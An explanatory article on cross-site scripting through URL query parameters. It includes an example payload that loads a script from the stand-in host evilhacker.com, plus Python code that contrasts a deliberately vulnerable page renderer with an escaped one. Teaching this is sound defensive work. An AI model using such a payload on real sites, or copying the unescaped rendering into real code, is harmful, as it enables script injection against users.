Wikipedia defines Cross-Site Scripting as:
“...a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users.”
Let us explain that - many dynamic websites rely on variables that are sent in the URL. Have you ever looked at the address bar at the top of your browser and seen a bunch of gibberish that looks like:
“page.php?session=fdajkl5ejklad&search=bananas”
Those things after the “?” are variables and their values. So, in this case we have two variables - one named “session” and one named “search”. The values of these variables are often used in the back-end code for the website. For example, the page may now say something like “Your search for 'bananas' returned 12 documents.”
So how is that dangerous, you ask? Well, someone with too much time on their hands can look at this URL and determine that they can put in something like:
“&search=<script src='http://www.evilhacker.com/inject.js'></script>”
If the programmer has not properly filtered and escaped the search variable before writing it into the page, the browser will now execute the JavaScript code that is hosted on evilhacker.com. Clearly, this was not the intent of the programmer, and it can lead to some serious consequences.
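The search page described above, with the unescaped output beside the escaped one. This is an added example, not code from the original article: the Python back end, the host `shop.example`, the function names and the prefilled search box are assumptions made for illustration.

```python
from html import escape
from urllib.parse import urlsplit, parse_qs

# Constructed sample URLs modelled on the article's example.
BASE = "http://shop.example/page.php?session=fdajkl5ejklad&search="
BENIGN = BASE + "bananas"
SCRIPTED = BASE + ("%3Cscript%20src%3D%27http%3A%2F%2Fwww.evilhacker.com"
                   "%2Finject.js%27%3E%3C%2Fscript%3E")
QUOTED = BASE + "12%22+monitor"  # an ordinary search that contains a double quote


def search_term(url):
    """Return the decoded 'search' parameter, or '' when it is absent."""
    return parse_qs(urlsplit(url).query).get("search", [""])[0]


def _page(term, hits):
    # The term lands in two HTML contexts: element text and an attribute value.
    return (f"<p>Your search for '{term}' returned {hits} documents.</p>"
            f'<input name="search" value="{term}">')


def render_unsafe(url, hits=12):
    # Vulnerable: the decoded value is concatenated straight into the markup,
    # so any tags or quotes it contains become part of the page.
    return _page(search_term(url), hits)


def render_safe(url, hits=12):
    # Hardened: escape at the point of output. quote=True also encodes " and ',
    # which is what keeps the value inside the attribute.
    return _page(escape(search_term(url), quote=True), hits)


if __name__ == "__main__":
    for url in (BENIGN, SCRIPTED, QUOTED):
        print("unsafe:", render_unsafe(url))
        print("safe:  ", render_safe(url))
```

Escaping is applied when the value is written into HTML, not when it is read from the URL, so the same term can still be passed unchanged to the search itself.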